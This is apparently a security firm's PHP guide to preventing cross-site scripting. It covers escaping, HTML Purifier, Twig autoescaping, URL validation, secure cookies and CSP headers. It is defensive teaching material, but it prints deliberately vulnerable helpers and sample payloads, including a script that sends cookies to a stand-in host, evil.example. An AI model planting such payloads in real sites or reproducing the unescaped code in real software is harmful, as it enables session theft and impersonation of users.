**Cross-Site Scripting** (abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious JavaScript payload to an end user.

XSS vulnerabilities are *very* common in web applications. They're a special case of code injection attack, except that where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.

There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:

* **Stored XSS** occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user accesses a particular web page.
* **Reflective XSS** occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.

Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of nefarious goals, including:

* Steal your [session identifier](https://paragonie.com/blog/2015/04/fast-track-safe-and-secure-php-sessions) so they can impersonate you and access the web application.
* Redirect you to a phishing page that gathers sensitive information.
* Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
* Perform tasks on your behalf (e.g. create a new administrator account with the attacker's credentials).

Cross-Site Scripting represents an asymmetry in the security landscape. XSS vulnerabilities are incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements.

# Brief XSS Mitigation Guide

1. If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. `url`, `html_attr`, `html`). **Context matters to XSS prevention.**
2. `echo htmlentities($string, ENT_QUOTES | ENT_HTML5, 'UTF-8');` is a safe and effective way to stop XSS when printing into HTML text or a quoted attribute value on a UTF-8 encoded web page, but doesn't allow any HTML.
3. If your requirements allow you to use e.g. Markdown instead of HTML, then [don't use HTML](#avoid-html).
4. If you need to allow some HTML and aren't using a templating engine (see #1), use [HTML Purifier](http://htmlpurifier.org).
5. For user-provided URLs, you additionally want to only allow `http:` and `https:` schemes; never `javascript:`. Furthermore, URL-encode any user input that becomes part of a URL.

The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.

## What Does an XSS Vulnerability Look Like?

XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.

### Example 1
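As a minimal sketch of the kind of page this example has in mind, assume a hypothetical `renderProfileUnsafe()` helper that prints a stored `profile` value without escaping. The function name, the markup, and the `evil.example` payload are illustrative assumptions, not code from any particular application.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical, deliberately vulnerable helper: the stored profile text is
 * concatenated into the page without any escaping.
 */
function renderProfileUnsafe(array $user): string
{
    return '<div class="profile">' . $user['profile'] . '</div>';
}

// Illustrative payload an attacker might have saved as their profile text.
$user = [
    'profile' => '<script>new Image().src = "https://evil.example/?c=" + document.cookie;</script>',
];

// The script tag reaches the browser intact and runs for every visitor.
echo renderProfileUnsafe($user), PHP_EOL;
```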
Printing a user's `profile` field into the page is a potential **stored XSS** injection point (assuming the `profile` field was pulled straight from the database without escaping). If a malicious user is able to save a `<script>` snippet in their profile, they can exploit any authenticated user who visits that profile and steal their cookies for future impersonation efforts.

### Example 2
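A minimal sketch of a page with this flaw, assuming a hypothetical `renderBodyUnsafe()` helper that copies a decoded request value into a double-quoted attribute. The helper, the `class` attribute, and the way the value reaches the page are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical, deliberately vulnerable helper: a request value is placed
 * inside a double-quoted attribute without escaping.
 */
function renderBodyUnsafe(string $value): string
{
    return '<body class="' . $value . '">';
}

// The URL-encoded payload, decoded the way it would arrive in the page.
$value = rawurldecode('%22%20onload%3D%22alert(%27XSS%27)%3B');

// The leading quote closes the attribute early, so onload becomes a
// second, attacker-controlled attribute on the same element.
echo renderBodyUnsafe($value), PHP_EOL;
// prints <body class="" onload="alert('XSS');">
```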
A page that copies request data into an HTML attribute without escaping it is vulnerable to **reflective XSS** attacks. Just trick a user into visiting `/form.php?%22%20onload%3D%22alert(%27XSS%27)%3B` and they will see an alert box pop up containing the message 'XSS' when your page loads.

---------

Unlike [SQL Injection](https://paragonie.com/blog/2015/05/preventing-sql-injection-in-php-applications-easy-and-definitive-guide), which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.

## The Quick and Dirty XSS Mitigation Technique for PHP Applications

The simplest and most effective way to prevent XSS attacks is the nuclear option: **Ruthlessly escape any character that can affect the structure of your document.**

For best results, you want to use the built-in `htmlentities()` function that PHP offers instead of playing with string escaping yourself.

```php
<?php
/**
 * Escape all HTML, JavaScript, and CSS
 *
 * @param string $input The input string
 * @param string $encoding Which character encoding are we using?
 * @return string
 */
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

// Illustrative markup: the value placed inside the attribute is escaped.
echo '<h2 title="', noHTML($title), '">', $articleTitle, '</h2>', "\n";
echo noHTML($some_data), "\n";
```

The security of this construction depends on the presence of the `ENT_QUOTES` flag when escaping HTML attribute values. It's important to note that this prevents *any HTML markup* in `$some_data` from being rendered as markup; it is displayed as literal text instead.

### Why `ENT_QUOTES | ENT_HTML5` and `'UTF-8'`?

We specify `ENT_QUOTES` to tell `htmlentities()` to escape quote characters (`"` and `'`). This is helpful for situations such as printing a value inside a quoted attribute (for example, the `value` of a form field). If you fail to specify `ENT_QUOTES`, an attacker simply needs to pass `" onload="malicious javascript code` as a value to that form field and presto, instant client-side code execution.

We specify `ENT_HTML5` and `'UTF-8'` so `htmlentities()` knows what character set and version of the HTML standard to work with. The reason we need to specify both values is that, as [demonstrated against `mysql_real_escape_string()`](http://stackoverflow.com/a/12118602/2224584), an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies. For the sake of safety and consistency, the encoding we specify here, the encoding sent in the `charset` attribute of the `<meta>` tag, and the `charset` added to the `Content-Type` HTTP header should all match.
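To make the effect of `ENT_QUOTES` concrete, here is a small sketch that escapes the same payload with and without quote escaping. The `noHTML()` body matches the helper used in this guide; `escapeWithoutQuotes()`, `HTML_CHARSET`, and `sendHtmlContentType()` are hypothetical names introduced only for the comparison.

```php
<?php
declare(strict_types=1);

// One constant drives both the escaping and the Content-Type header,
// so the two cannot drift apart. (HTML_CHARSET is a name made up here.)
const HTML_CHARSET = 'UTF-8';

function noHTML(string $input, string $encoding = HTML_CHARSET): string
{
    return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

// Deliberately weak variant for comparison: quotes are left untouched.
function escapeWithoutQuotes(string $input): string
{
    return htmlentities($input, ENT_NOQUOTES | ENT_HTML5, HTML_CHARSET);
}

// Hypothetical helper: declare the same charset in the response header.
function sendHtmlContentType(): void
{
    if (!headers_sent()) {
        header('Content-Type: text/html; charset=' . HTML_CHARSET);
    }
}

$payload = '" onload="alert(1)';

// Still contains raw double quotes, so it can close an attribute early.
echo escapeWithoutQuotes($payload), PHP_EOL;

// No raw quote characters survive, so the value stays inside the attribute.
echo noHTML($payload), PHP_EOL;
```

Calling `sendHtmlContentType()` before any output keeps the header's `charset` in step with the encoding passed to `htmlentities()`.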

### Important - Avoid Premature Optimization

**Always escape data on output (when displaying to a user)**. Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnönen of Klikki Oy realized [MySQL column truncation can defeat before-insert XSS prevention strategies](https://klikki.fi/adv/wordpress2.html).

You should still be **validating your input**, however. If you're expecting an email address, make sure it's formatted like one.

```php
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
    // Not a valid email address! Handle this invalid input here.
}
```

If you're using MySQL, make sure any values going into a `TEXT` field will fit in less than 64 KiB. MySQL will truncate `TEXT` values that exceed that length (unless strict SQL mode makes it reject them instead), which can cause both security issues (as WordPress experienced) and data integrity issues.

--------------------

The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow *some* markup, while not opening the door for *any* markup?

Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?

<h3 id="avoid-html">Avoid HTML If You Can</h3>

An attractive solution is to adopt a rendering format such as BBCode, Markdown, or reStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML markup while still allowing a limited subset of markup options to make a user's contributions more expressive and powerful.

**If you can avoid accepting raw HTML** by using another markup language such as Markdown, **please do so.** If you can bolt a [WYSIWYG](https://github.com/sofish/pen#readme) editor onto it for non-technical users, even better.

This means doing the following:

1. Escape **ALL** HTML first, so arbitrary HTML is not passed to the renderer.
2. Render the output of step 1.

For example:

```php
<?php
declare(strict_types=1);
namespace Foo\Bar;

use League\CommonMark\CommonMarkConverter;

class ExampleRenderer
{
    /** @var CommonMarkConverter $markdown */
    protected $markdown;

    public function __construct(CommonMarkConverter $markdown)
    {
        $this->markdown = $markdown;
    }

    /**
     * Escape HTML, then pass to the Markdown renderer.
     *
     * @param string $input
     * @return string
     */
    public function renderUserInput(string $input): string
    {
        // htmlspecialchars() escapes only &, <, >, " and ', so Markdown
        // punctuation such as * and # reaches the renderer unchanged.
        // (htmlentities() with ENT_HTML5 would turn those into entities too.)
        $escaped = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
        return (string) $this->markdown->convertToHtml($escaped);
    }

    /**
     * Escape all HTML, JavaScript, and CSS
     * 
     * @param string $input The input string
     * @param string $encoding Which character encoding are we using?
     * @return string
     */
    public static function noHTML(string $input, string $encoding = 'UTF-8'): string
    {
        return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
    }
}
```
Note, however, that your output will in most cases still be HTML, so don't stop reading here.

## An Order of HTML Please, Hold the XSS Payload

Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users.

How can we resolve this conflict? Simple: Use a library such as **[HTML Purifier](http://htmlpurifier.org).**

Most of the [clever XSS tricks](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) hidden in the HTML specification are easily [defeated by HTMLPurifier](http://htmlpurifier.org/live/smoketests/xssAttacks.php), if used correctly.

### How to Use HTMLPurifier to Stop XSS Attacks

Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.
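```php
<?php
// Assumes HTML Purifier is installed and autoloadable (e.g. via Composer).
$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);

// Purify the untrusted HTML before printing it into the page body.
echo $htmlp->purify($user['profile']);
?>
```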
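To see why naive search-and-replace filtering falls short, consider the sketch below. `naiveFilter()` is a hypothetical blacklist filter written for this illustration (it is not part of HTML Purifier); a nested payload reassembles itself once the filter has run.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical blacklist filter: deletes every literal "<script>" it finds.
 * Shown only to illustrate the weakness; do not use this in real code.
 */
function naiveFilter(string $html): string
{
    return str_ireplace('<script>', '', $html);
}

// The attacker splits one tag around another copy of the blocked string.
$payload = '<scr<script>ipt>alert(1)</script>';

// Removing the inner "<script>" glues the outer pieces back together.
echo naiveFilter($payload), PHP_EOL; // prints <script>alert(1)</script>
```

A parser-based approach avoids this class of bypass because it validates the document that results, not the substrings that went in.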
### Optimizing HTMLPurifier

Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users.

This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it).

```php
$db->insert('blog_comments', [
    /* Other fields */
    'original_body' => $_POST['body'],
    'rendered_body' => $htmlp->purify($_POST['body'])
]);
```

### **Important:** When Not to Use HTML Purifier

HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic. It cannot tell what the rest of the web page is doing immediately before and after the untrusted string you invoke it on.

For example, even though it uses HTML Purifier, printing the purified `username` parameter directly inside a quoted HTML attribute is still **insecure**. Simply pass the string `" onload="alert('XSS');` to `username` and you have client-side code execution.

When inserting any variables into another context, you should also run them through `htmlspecialchars()` (or `noHTML()` above) to ensure they don't break out and add extra attributes to the parent element. Wrapping the purified value in `noHTML()` before printing it into the attribute is safe. Passing the whole tag, attribute and untrusted value included, through `purify()` is also safe against XSS attacks, but still a *bad idea*.

As it turns out, **context matters a lot for preventing cross-site scripting attacks**. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).

### What About Other Contexts?

We've uncovered two rules for preventing XSS attacks so far:

1. Always escape all HTML entities (e.g. with `noHTML()` defined above) when inserting data into an HTML attribute.
2. Always purify (e.g. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page.

What do we do if we want to add a user-provided parameter to a `style` tag or attribute? What if we want to define a default value for a JavaScript variable? What about hyperlinks?

## Context-Sensitive HTML Escaping in Template Engines

Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: **Use templating libraries.**

A popular PHP templating engine, [Twig](http://twig.sensiolabs.org), makes [contextual XSS filtering](http://twig.sensiolabs.org/doc/filters/escape.html) a walk in the park:

```twig
{% autoescape 'css' %}
Test
{% endautoescape %}

{% autoescape 'html' %}
{{ some_var }}
{{ not_user_provided|raw }}
{{ username }}
{% endautoescape %}
```

If you're using Twig, you should prefer wrapping entire sections in `{% autoescape %}` blocks over applying `|e` filters to every printed template variable. Not only does auto-escaping make your code easier to read, but it prevents a single oversight from becoming an entry point for an attacker with a malicious payload.

### What If I Cannot Use a Templating Engine?

Then you're doomed to reinvent the wheel, possibly insecurely.

* Strip HTML wherever you don't absolutely need to allow it.
* Use something like HTMLPurifier to prevent XSS when rich content is required, even if there's [an intermediary step (e.g. a Markdown renderer)](#avoid-html) in the midst.
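Without a template engine, each output context needs its own escaping call. As a small illustration of the attribute rule from earlier, the sketch below prints an untrusted value inside a double-quoted attribute and again as element text. `noHTML()` mirrors the helper from this guide; `dataAttribute()` and the `data-username` attribute are hypothetical names chosen for the example.

```php
<?php
declare(strict_types=1);

function noHTML(string $input, string $encoding = 'UTF-8'): string
{
    return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

/**
 * Hypothetical helper: build a <span> whose attribute and text both carry
 * untrusted data, escaping each value at the point of output.
 */
function dataAttribute(string $username): string
{
    return '<span data-username="' . noHTML($username) . '">'
        . noHTML($username)
        . '</span>';
}

// The attribute-breaking payload discussed earlier in this guide.
$html = dataAttribute('" onload="alert(\'XSS\');');

// The quotes are now entities, so no new attribute can be introduced.
echo $html, PHP_EOL;
```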

#### Safely Handling Hyperlinks Without a Templating Engine

If you need to accept arbitrary URLs from your users, and you aren't using a templating engine that supports context-aware URL escaping, apply the following rules:

1. Only allow `https:` URI schemes. Possibly `http:`. Never `javascript:`.
2. URL-encode any user input before escaping HTML.

For example:

```php
<?php
declare(strict_types=1);
namespace Foo\Bar;

class UserProvidedLinks
{
    /** @var array $allowedSchemes */
    protected $allowedSchemes = [];

    public function __construct(array $allowedSchemes = ['https'])
    {
        $this->allowedSchemes = $allowedSchemes;
    }

    /**
     * Only allow valid schemes
     *
     * @param string $url
     * @return string
     */
    public function validateUrl(string $url): string
    {
        $parsed = parse_url($url);
        if (!\is_array($parsed)) {
            return '#';
        }
        // Relative or scheme-less URLs have no 'scheme' key; reject them too.
        if (!isset($parsed['scheme'])) {
            return '#';
        }
        // URI schemes are case-insensitive, so compare in lowercase.
        if (!\in_array(\strtolower($parsed['scheme']), $this->allowedSchemes, true)) {
            return '#';
        }
        return $url;
    }
}
```
Usage:

```php
<?php

$filter = new Foo\Bar\UserProvidedLinks([
    'http',
    'https'
]);

// Full URL provided by user
echo '<a href="', noHTML(
        $filter->validateUrl($userProvidedLink)
    ), '">', noHTML($userProvidedLabel), '</a>', PHP_EOL;

// Partial URL provided by user:
echo '<a href="https://example.com/page/', 
        noHTML(urlencode($page)),
    '">', noHTML($label), '</a>', PHP_EOL;
```
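A related detail when building partial URLs: `urlencode()` encodes a space as `+`, which is the form-encoding convention for query strings, while `rawurlencode()` produces `%20`, which is what a path segment expects. The sketch below compares the two and builds a query string with `http_build_query()`; the `example.com` URLs and the variable names are placeholders.

```php
<?php
declare(strict_types=1);

$page = 'annual report/2015';

// Path segment: rawurlencode() encodes the space as %20 and the slash as %2F.
$path = 'https://example.com/page/' . rawurlencode($page);

// Query string: http_build_query() encodes each value for you.
$query = 'https://example.com/search?' . http_build_query(['q' => 'cats & dogs']);

echo $path, PHP_EOL;            // https://example.com/page/annual%20report%2F2015
echo $query, PHP_EOL;           // https://example.com/search?q=cats+%26+dogs
echo urlencode($page), PHP_EOL; // annual+report%2F2015
```

Whichever encoder fits, the finished URL still needs `noHTML()` when it is printed into an `href` attribute.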
    
## Browser-Level XSS Mitigation

There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: **HTTPS-Only Cookies** (which means HTTP-Only cookies which only transmit over TLS) and **Content-Security-Policy** headers.

### Secure Cookies

Any time you [set a cookie in PHP](https://php.net/manual/en/function.setcookie.php), you should set both `httpOnly` and `secure` to `true`. (This assumes your website is only accessible over HTTPS, which it should be.) Your session cookie, especially, should not be made available to JavaScript. This can be achieved either by adding these lines to `php.ini`, or by setting them manually on every request:

```ini
session.cookie_httponly = On
session.cookie_secure = On
```

Setting the session cookie parameters on every page load:

```php
session_set_cookie_params(
    0,                 // Lifetime -- 0 means erase when browser closes
    '/',               // Which paths are these cookies relevant?
    '.yourdomain.com', // Only expose this to which domain?
    true,              // Only send over the network when TLS is used
    true               // Don't expose to Javascript
);
session_start();
```

### Content-Security-Policy headers

`Content-Security-Policy` headers significantly reduce the risk and impact of XSS attacks in modern browsers by specifying a whitelist in the HTTP response headers which dictates what the HTTP response body can do. They don't protect against an attacker capable of modifying the source files on the server, but most real-world XSS vulnerabilities will fail to execute if CSP headers are used properly.
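Since the policy is an ordinary response header, PHP can send it with `header()` before any output. The sketch below assembles a policy string from an array and adds a per-request script nonce; `buildCsp()`, `sendCsp()`, and the directive list are hypothetical and only meant to show the shape of the idea.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: turn ['directive' => [sources...]] into a CSP value.
 */
function buildCsp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = trim($name . ' ' . implode(' ', $sources));
    }
    return implode('; ', $parts);
}

// Hypothetical helper: send the header unless output has already started.
function sendCsp(string $policy): void
{
    if (!headers_sent()) {
        header('Content-Security-Policy: ' . $policy);
    }
}

// A fresh, unpredictable nonce for this response only.
$nonce = base64_encode(random_bytes(16));

$policy = buildCsp([
    'script-src' => ["'self'", "'nonce-{$nonce}'"],
    'object-src' => ["'none'"],
    'upgrade-insecure-requests' => [],
]);

sendCsp($policy);

// Only inline scripts carrying the matching nonce attribute may run.
echo '<script nonce="', htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8'),
    '">/* trusted inline code */</script>', PHP_EOL;
```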
An example of a CSP header looks like this:

```
Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
```

HTML5 Rocks has a great [introductory tutorial for Content-Security-Policy headers](http://www.html5rocks.com/en/tutorials/security/content-security-policy) if you would like to learn more about writing them.

### Paragon Initiative Enterprises' CSP Compiler

Ever wanted to make `Content-Security-Policy` headers easier to manage? Whether you'd rather just edit a JSON file than remember the syntax of a CSP header, or you'd rather build the headers for a particular request programmatically (e.g. to use the script-nonce feature), check out our MIT-licensed [CSP Builder](https://paragonie.com/project/csp-builder) project.

## Summary

1. Use `Content-Security-Policy` headers and HTTPS-only cookies.
2. Your first line of defense against XSS attacks should be filtering any tainted information before inserting it into the DOM, **not before storing it in a database**.
3. If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML.
4. If you're using a templating engine such as [Twig](http://twig.sensiolabs.org), use `{% autoescape %}` directives and `|e` filters where appropriate. `{% autoescape %}` should be prioritized over escaping every variable.
5. If you're not using a templating engine and need to safely render user-provided HTML, use [HTML Purifier](http://htmlpurifier.org). Feel free to leverage caching for optimization, but keep an intact copy on-hand.
6. Otherwise, use `noHTML()` and leave nothing to chance.
7. For hyperlinks:
    1. Don't allow `javascript:` URIs, full stop. Consider whitelisting `https:`.
    2. URL-encode all user input.
## External Links and Resources

* [OWASP's XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
* [OWASP's PHP Security Cheat Sheet](https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet)
* [`Content-Security-Policy` Builder](https://paragonie.com/project/csp-builder)

## We Consult

We are a team of [technology consultants](https://paragonie.com/service/consulting), [web developers](https://paragonie.com/service/web-development), [code reviewers](https://paragonie.com/service/code-review), and [application security specialists](https://paragonie.com/service/appsec) based in Orlando, FL. If you're concerned about the risk of cross-site scripting in your business applications, [get in touch with us today](https://paragonie.com/contact).